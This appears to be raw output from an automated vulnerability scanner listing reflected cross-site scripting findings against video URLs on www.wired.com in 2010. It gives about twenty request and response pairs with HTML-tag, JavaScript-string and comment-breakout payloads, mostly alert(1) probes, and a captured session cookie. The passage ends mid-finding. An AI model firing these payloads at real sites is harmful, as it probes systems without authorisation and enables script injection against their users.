The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f93"><a>681f894aa14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/redditc3f93"><a>681f894aa14 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:55:50 GMT Date: Mon, 22 Nov 2010 00:51:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_redditc3f93"><a>681f894aa14"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b91b2"-alert(1)-"3d3cbc63103 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/redditb91b2"-alert(1)-"3d3cbc63103 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:27 GMT Date: Mon, 22 Nov 2010 00:52:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597a6"><a>6c7de32e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video597a6"><a>6c7de32e4a/science HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29272 Vary: Accept-Encoding Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:55:43 GMT Date: Mon, 22 Nov 2010 00:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video597a6"><a>6c7de32e4a ss_science"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc810"-alert(1)-"430ff756626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/sciencefc810"-alert(1)-"430ff756626 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:58:12 GMT Date: Mon, 22 Nov 2010 00:53:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbc6"><a>d4e24611f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/science9dbc6"><a>d4e24611f94 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:28 GMT Date: Mon, 22 Nov 2010 00:52:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_science9dbc6"><a>d4e24611f94"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a9b"><a>b1b48537299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video25a9b"><a>b1b48537299/search/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:50:55 GMT Date: Mon, 22 Nov 2010 00:46:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video25a9b"><a>b1b48537299 ss_search"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba52"><a>8549dae7a51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/searchcba52"><a>8549dae7a51/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:52:49 GMT Date: Mon, 22 Nov 2010 00:48:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_searchcba52"><a>8549dae7a51"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ddb"-alert(1)-"24d4282cfc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/searchc7ddb"-alert(1)-"24d4282cfc2/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:53:57 GMT Date: Mon, 22 Nov 2010 00:49:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87341"><a>5e3fd03ab6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video87341"><a>5e3fd03ab6b/security HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:54 GMT Date: Mon, 22 Nov 2010 00:49:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video87341"><a>5e3fd03ab6b ss_security"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b027"><a>b24f73bee4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security5b027"><a>b24f73bee4d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:56:58 GMT Date: Mon, 22 Nov 2010 00:52:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_security5b027"><a>b24f73bee4d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66457"-alert(1)-"8080235918c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security66457"-alert(1)-"8080235918c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:10 GMT Date: Mon, 22 Nov 2010 00:53:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6eaf0--><script>alert(1)</script>b17d17bd8db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6eaf0--><script>alert(1)</script>b17d17bd8db/stars-line-up-for-tron-game--evolution/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29465 Vary: Accept-Encoding Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:57:53 GMT Date: Mon, 22 Nov 2010 00:52:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6eaf0--><script>alert(1)</script>b17d17bd8db/stars-line-up-for-tron-game--evolution/645408465001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4d8"><a>7a613a7e74e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video3b4d8"><a>7a613a7e74e/stars-line-up-for-tron-game--evolution/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29432 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:10 GMT Date: Mon, 22 Nov 2010 00:52:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video3b4d8"><a>7a613a7e74e ss_stars-line-up-for-tron-game--evolution c_645408465001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d824"-alert(1)-"d4829406e77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/stars-line-up-for-tron-game--evolution3d824"-alert(1)-"d4829406e77/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:58:45 GMT Date: Mon, 22 Nov 2010 00:54:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abd75"><a>4bcfe5fa8de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/stars-line-up-for-tron-game--evolutionabd75"><a>4bcfe5fa8de/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:57:35 GMT Date: Mon, 22 Nov 2010 00:53:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_stars-line-up-for-tron-game--evolutionabd75"><a>4bcfe5fa8de c_645408465001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2769"-alert(1)-"afb5406fedf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/stars-line-up-for-tron-game--evolution/645408465001f2769"-alert(1)-"afb5406fedf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:55 GMT Date: Mon, 22 Nov 2010 00:54:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437aa"><a>4f2862441ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/stars-line-up-for-tron-game--evolution/645408465001437aa"><a>4f2862441ba HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=284 Expires: Mon, 22 Nov 2010 00:58:56 GMT Date: Mon, 22 Nov 2010 00:54:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_stars-line-up-for-tron-game--evolution c_645408465001437aa"><a>4f2862441ba"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6de"><a>cf9acababf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
